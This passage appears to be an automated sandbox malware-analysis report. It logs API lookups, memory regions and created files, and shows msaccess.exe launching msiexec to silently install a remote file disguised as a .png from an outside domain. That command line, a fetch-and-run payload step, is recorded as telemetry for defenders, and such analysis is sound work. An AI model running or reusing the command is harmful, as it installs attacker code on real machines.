| Get Address | Unknown module name | function = VarOr, address_out = 0x75e7ecfa |
|
1 | |
| Get Address | Unknown module name | function = VarPow, address_out = 0x75e7ea66 |
|
1 | |
| Get Address | Unknown module name | function = VarSub, address_out = 0x75e7d332 |
|
1 | |
| Get Address | Unknown module name | function = VarXor, address_out = 0x75e7ee2e |
|
1 | |
| Get Address | Unknown module name | function = VarAbs, address_out = 0x75e7ca11 |
|
1 | |
| Get Address | Unknown module name | function = VarFix, address_out = 0x75e7cc5f |
|
1 | |
| Get Address | Unknown module name | function = VarInt, address_out = 0x75e7cde7 |
|
1 | |
| Get Address | Unknown module name | function = VarNeg, address_out = 0x75e7c802 |
|
1 | |
| Get Address | Unknown module name | function = VarNot, address_out = 0x75e7ec66 |
|
1 | |
| Get Address | Unknown module name | function = VarRound, address_out = 0x75e7d155 |
|
1 | |
| Get Address | Unknown module name | function = VarCmp, address_out = 0x75e1b0dc |
|
1 | |
| Get Address | Unknown module name | function = VarDecAdd, address_out = 0x75e35f3e |
|
1 | |
| Get Address | Unknown module name | function = VarDecCmp, address_out = 0x75e24fd0 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCat, address_out = 0x75e20d2c |
|
1 | |
| Get Address | Unknown module name | function = VarCyMulI4, address_out = 0x75e359ed |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCmp, address_out = 0x75e0f8b8 |
|
1 | |
| Get Address | Unknown module name | function = CoCreateInstanceEx, address_out = 0x772f9d4e |
|
1 | |
| Get Address | Unknown module name | function = CLSIDFromProgIDEx, address_out = 0x772c0782 |
|
1 | |
| Get Address | Unknown module name | function = 1, address_out = 0x6d292c38 |
|
1 | |
| Get Address | Unknown module name | function = 3, address_out = 0x6d291c65 |
|
1 | |
| Get Address | Unknown module name | function = 5, address_out = 0x6d291d73 |
|
1 | |
| Get Address | Unknown module name | function = 595, address_out = 0x6cad16d2 |
|
4 | |
| Get Address | Unknown module name | function = 537, address_out = 0x6c988a48 |
|
4 | |
| Get Address | Unknown module name | function = 716, address_out = 0x6caf6ece |
|
4 | |
| Get Address | Unknown module name | function = 632, address_out = 0x6c987f32 |
|
4 | |
| Get Address | Unknown module name | function = 516, address_out = 0x6c9892c0 |
|
4 | |
| Get Address | Unknown module name | function = 608, address_out = 0x6c988aa8 |
|
4 | |
| Get Address | Unknown module name | function = 631, address_out = 0x6c987eed |
|
4 | |
| Get Address | Unknown module name | function = 581, address_out = 0x6c987974 |
|
4 | |
| Get Address | Unknown module name | function = 713, address_out = 0x6cb1216f |
|
4 | |
| Get Address | Unknown module name | function = 681, address_out = 0x6cad1351 |
|
4 | |
| Get Address | Unknown module name | function = 717, address_out = 0x6cb015d4 |
|
4 |
Window (3)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 | |
| Create | - | - |
|
1 | |
| Create | - | - |
|
1 |
System (7)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 562, y_out = 448 |
|
1 | |
| Get Time | type = Local Time, time = 2019-01-21 12:19:04 (Local Time) |
|
1 | |
| Get Time | type = Ticks, time = 10895297 |
|
1 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
2 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = DDRYBUR |
|
1 |
Process #2: msiexec.exe
13
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\msiexec.exe |
| Command Line | "C:\Windows\System32\msiexec.exe" /q /i https://jplymell.com/dmc/ImgFilePDF876356653680900897fXmfwICxiOWbsPLJpy.png |
| Initial Working Directory | C:\Users\JPenUM\Desktop\ |
| Monitor | Start Time: 00:00:38, Reason: Child Process |
| Unmonitor | End Time: 00:01:37, Reason: Self Terminated |
| Monitor Duration | 00:00:59 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xed4 |
| Parent PID | 0xe20 (c:\program files\microsoft office\office15\msaccess.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ARRARNMKU\JPenUM |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
ED8
0x
EDC
0x
EE0
0x
EE4
0x
EE8
0x
EEC
0x
F2C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00051fff | Pagefile Backed Memory | rw |
|
|
|
- |
| msiexec.exe.mui | 0x00060000 | 0x00060fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000d0000 | 0x00136fff | Memory Mapped File | r |
|
|
|
- |
| windowsshell.manifest | 0x00140000 | 0x00140fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00140fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00151fff | Pagefile Backed Memory | r |
|
|
|
- |
| msimsg.dll.mui | 0x00160000 | 0x00173fff | Memory Mapped File | rw |
|
|
|
- |
| rpcss.dll | 0x00180000 | 0x001dbfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000180000 | 0x00180000 | 0x00180fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00190fff | Pagefile Backed Memory | rw |
|
|
|
- |
| msiexec.exe | 0x001f0000 | 0x00203fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00407fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000410000 | 0x00410000 | 0x004eefff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x0050ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00610fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000620000 | 0x00620000 | 0x0121ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01220000 | 0x014eefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000014f0000 | 0x014f0000 | 0x018effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000018f0000 | 0x018f0000 | 0x01a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001930000 | 0x01930000 | 0x0196ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000019d0000 | 0x019d0000 | 0x01a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001a40000 | 0x01a40000 | 0x01a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001b50000 | 0x01b50000 | 0x01b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001bf0000 | 0x01bf0000 | 0x01c2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c60000 | 0x01c60000 | 0x01c9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01d1ffff | Private Memory | rw |
|
|
|
- |
| msi.dll | 0x72f50000 | 0x7318ffff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74060000 | 0x7409ffff | Memory Mapped File | rwx |
|
|
|
- |
| wkscli.dll | 0x741b0000 | 0x741befff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x741c0000 | 0x741c8fff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x741d0000 | 0x741e0fff | Memory Mapped File | rwx |
|
|
|
- |
| msimsg.dll | 0x74790000 | 0x74796fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74a10000 | 0x74badfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x752a0000 | 0x752dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75500000 | 0x75515fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x758d0000 | 0x758e8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75980000 | 0x7598bfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75a20000 | 0x75a2dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75c20000 | 0x75c69fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75d30000 | 0x75df8fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75e00000 | 0x75e8efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75e90000 | 0x75ea8fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75ec0000 | 0x75f0dfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75f10000 | 0x76b59fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76ba0000 | 0x76c40fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76c50000 | 0x76cfbfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76ea0000 | 0x76f6bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76f70000 | 0x7700ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77010000 | 0x7702efff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77130000 | 0x771ccfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x771d0000 | 0x77226fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x772b0000 | 0x7740bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x777b0000 | 0x77883fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x778e0000 | 0x77a1bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77a70000 | 0x77af2fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77b20000 | 0x77b20fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd3000 | 0x7ffd3000 | 0x7ffd3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Windows\Installer\MSI81A0.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3:: |
|
|
| c:\users\jpenum\appdata\local\temp\msi70678.log | 0.42 KB |
MD5:
c5293974b91460d812105f7c9ec8f1e2
SHA1: 08794bb1f666efb6fa9ef399ce6146e497933c53 SHA256: 33868f1fa3247f2c0d6614eae55ed59cc8fbd72acee626037247ca954a413ef5 SSDeep: 12:Qw5R6pORbloaHlrNQnloj495MYD3BNjlCKVSyGluw:QkRLRb1lrgmcvDxRx2luw |
|
|
Host Behavior
File (2)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\windows\system32\msiexec.exe | type = PROCESS_WOW64_INFORMATION |
|
1 |
Module (5)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | COMCTL32 | base_address = 0x74a10000 |
|
1 | |
| Get Handle | c:\windows\system32\msiexec.exe | base_address = 0x1f0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x777b0000 |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll | function = InitCommonControlsEx, address_out = 0x74a309ce |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapSetInformation, address_out = 0x77804157 |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-17 05:31:23 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10893237 |
|
1 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
1 |
Process #3: msiexec.exe
3607
579
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\msiexec.exe |
| Command Line | C:\Windows\system32\msiexec.exe /V |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:39, Reason: RPC Server |
| Unmonitor | End Time: 00:02:30, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:51 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xef0 |
| Parent PID | 0x1e0 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F0C
0x
F08
0x
F04
0x
F00
0x
EFC
0x
EF8
0x
EF4
0x
F10
0x
F14
0x
F28
0x
FF0
0x
FF4
0x
FF8
0x
FFC
0x
804
0x
59C
0x
814
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00051fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000a0000 | 0x00106fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x001d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| msiexec.exe | 0x001f0000 | 0x00203fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x0028ffff | Pagefile Backed Memory | r |
|
|
|
- |
| msiexec.exe.mui | 0x00290000 | 0x00290fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x004b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x004c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x004d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x004e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x004f0000 | 0x007befff | Memory Mapped File | r |
|
|
|
- |
| msimsg.dll.mui | 0x007c0000 | 0x007d3fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x007e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x007f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x00801fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x0084ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x00850fff | Pagefile Backed Memory | rw |
|
|
|
- |
| wininet.dll.mui | 0x00860000 | 0x0086cfff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x008affff | Private Memory | rw |
|
|
|
- |
| index.dat | 0x008b0000 | 0x008b7fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000008b0000 | 0x008b0000 | 0x008b0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x008b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008c0000 | 0x008c0000 | 0x008fffff | Private Memory | rw |
|
|
|
- |
| index.dat | 0x00900000 | 0x00903fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x00900fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x00910000 | 0x00913fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x00910000 | 0x00917fff | Memory Mapped File | rw |
|
|
|
|
| index.dat | 0x00910000 | 0x00917fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000910000 | 0x00910000 | 0x0091ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000920000 | 0x00920000 | 0x0095ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000960000 | 0x00960000 | 0x009dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009e0000 | 0x009e0000 | 0x00a3ffff | Private Memory | rw |
|
|
|
- |
| index.dat | 0x009e0000 | 0x009e3fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000009e0000 | 0x009e0000 | 0x009fffff | Private Memory | rw |
|
|
|
- |
| index.dat | 0x009f0000 | 0x009f3fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000a00000 | 0x00a00000 | 0x00a3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ab0000 | 0x00ab0000 | 0x00aeffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x00af0000 | 0x00baffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000bd0000 | 0x00bd0000 | 0x00c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c10000 | 0x00c10000 | 0x00d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d10000 | 0x00d10000 | 0x00ebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d40000 | 0x00d40000 | 0x00d7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d90000 | 0x00d90000 | 0x00dcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e80000 | 0x00e80000 | 0x00ebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ec0000 | 0x00ec0000 | 0x00f7ffff | Private Memory | rw |
|
|
|
- |
| a6cfff.ipi | 0x00ec0000 | 0x00f3ffff | Memory Mapped File | rw |
|
|
|
|
| a6cfff.ipi | 0x00ec0000 | 0x00f3ffff | Memory Mapped File | rw |
|
|
|
|
| private_0x0000000000f90000 | 0x00f90000 | 0x00fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fd0000 | 0x00fd0000 | 0x010cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001100000 | 0x01100000 | 0x0113ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001160000 | 0x01160000 | 0x0119ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000011a0000 | 0x011a0000 | 0x01592fff | Pagefile Backed Memory | r |
|
|
|
- |
| msi81a0.tmp | 0x015a0000 | 0x01897fff | Memory Mapped File | r |
|
|
|
- |
| msi81a0.tmp | 0x018a0000 | 0x01b97fff | Memory Mapped File | r |
|
|
|
|
| private_0x00000000018a0000 | 0x018a0000 | 0x019a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000018a0000 | 0x018a0000 | 0x019fffff | Private Memory | rw |
|
|
|
- |
| ~df71e053e6f3c7d4ba.tmp | 0x018a0000 | 0x0191ffff | Memory Mapped File | rw |
|
|
|
|
| ~df407b72869e744829.tmp | 0x018a0000 | 0x0191ffff | Memory Mapped File | rw |
|
|
|
|
| private_0x0000000001a00000 | 0x01a00000 | 0x01bcffff | Private Memory | rw |
|
|
|
- |
| msi81a0.tmp | 0x01dd0000 | 0x020c7fff | Memory Mapped File | r |
|
|
|
|
| rasman.dll | 0x6e730000 | 0x6e744fff | Memory Mapped File | rwx |
|
|
|
- |
| rasapi32.dll | 0x6e750000 | 0x6e7a1fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x71ef0000 | 0x71ef5fff | Memory Mapped File | rwx |
|
|
|
- |
| webio.dll | 0x72140000 | 0x7218efff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x72190000 | 0x721e7fff | Memory Mapped File | rwx |
|
|
|
- |
| wshqos.dll | 0x723f0000 | 0x723f5fff | Memory Mapped File | rwx |
|
|
|
- |
| pnrpnsp.dll | 0x725e0000 | 0x725f1fff | Memory Mapped File | rwx |
|
|
|
- |
| sensapi.dll | 0x72680000 | 0x72685fff | Memory Mapped File | rwx |
|
|
|
- |
| msi.dll | 0x72f50000 | 0x7318ffff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x739f0000 | 0x739fcfff | Memory Mapped File | rwx |
|
|
|
- |
| wkscli.dll | 0x741b0000 | 0x741befff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x741c0000 | 0x741c8fff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x741d0000 | 0x741e0fff | Memory Mapped File | rwx |
|
|
|
- |
| napinsp.dll | 0x742a0000 | 0x742affff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x742c0000 | 0x742d1fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x742e0000 | 0x74317fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x74330000 | 0x7433cfff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x74420000 | 0x74426fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74430000 | 0x7444bfff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x74590000 | 0x7459ffff | Memory Mapped File | rwx |
|
|
|
- |
| msimsg.dll | 0x74790000 | 0x74796fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c0fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74a10000 | 0x74badfff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x75010000 | 0x75014fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x750c0000 | 0x750d5fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x750e0000 | 0x750f6fff | Memory Mapped File | rwx |
|
|
|
- |
| credssp.dll | 0x751d0000 | 0x751d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x751e0000 | 0x7521cfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x752a0000 | 0x752dafff | Memory Mapped File | rwx |
|
|
|
- |
| schannel.dll | 0x75310000 | 0x75349fff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x75380000 | 0x753c3fff | Memory Mapped File | rwx |
|
|
|
- |
| wship6.dll | 0x754b0000 | 0x754b5fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x754c0000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75500000 | 0x75515fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x75630000 | 0x75646fff | Memory Mapped File | rwx |
|
|
|
- |
| ncrypt.dll | 0x75650000 | 0x75687fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x758d0000 | 0x758e8fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x75940000 | 0x75947fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75960000 | 0x7597afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75980000 | 0x7598bfff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x759f0000 | 0x75a18fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75a20000 | 0x75a2dfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75a30000 | 0x75a3afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75aa0000 | 0x75aabfff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75ab0000 | 0x75bccfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75c20000 | 0x75c69fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75c70000 | 0x75c96fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75d30000 | 0x75df8fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75e00000 | 0x75e8efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75e90000 | 0x75ea8fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75ec0000 | 0x75f0dfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75f10000 | 0x76b59fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76b60000 | 0x76b94fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76ba0000 | 0x76c40fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76c50000 | 0x76cfbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x76d60000 | 0x76e95fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76ea0000 | 0x76f6bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76f70000 | 0x7700ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77010000 | 0x7702efff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77030000 | 0x77124fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77130000 | 0x771ccfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x771d0000 | 0x77226fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x772b0000 | 0x7740bfff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x775b0000 | 0x777aafff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x777b0000 | 0x77883fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x77890000 | 0x778d4fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x778e0000 | 0x77a1bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77a70000 | 0x77af2fff | Memory Mapped File | rwx |
|
|
|
- |
